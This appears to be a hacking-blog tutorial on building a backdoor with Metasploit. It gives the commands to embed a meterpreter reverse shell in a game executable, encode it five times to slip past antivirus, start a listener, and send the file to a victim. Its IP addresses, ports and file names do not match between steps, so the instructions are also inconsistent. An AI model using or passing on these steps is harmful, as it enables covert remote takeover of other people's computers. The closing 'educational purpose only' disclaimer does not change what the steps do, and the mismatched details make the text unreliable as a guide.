Create backdoor using metasploit

Requirement

1. Metasploit framework 4/3/2
2. Linux OS (Bactrack is Recommended)

Lets start

1. First at all you should prepare your target EXE file. In our case we will use game.exe as the name of our backdoor

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > game.com
In case if the victim uses anti-virus you must encode the backdoor 5 times, like this

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/game.exe -o /root/Desktop/game2.exe

2. Because we selected reverse meterpreter payload, we need to setup the exploit handler to handle the connection back to our attacking machine. In this case attacker use IP address 192.168.8.92. Go to Metasploit console by typing msfconsole, and then run

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp 
msf exploit(handler) > set LHOST 192.168.8.92 LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443 LPORT => 443 msf
exploit(handler) > exploit 

3. The next step we can send our special game2.exe files to victim, as soon as they download and open it, there's meterpreter shell on victim computer

Note: We Take no responsibility every tutorial here is for educational Purpose Only Earn upto Rs 5000 Per Month. with daily payout of Rs 500 or more. Join now!

Comments

Popular Posts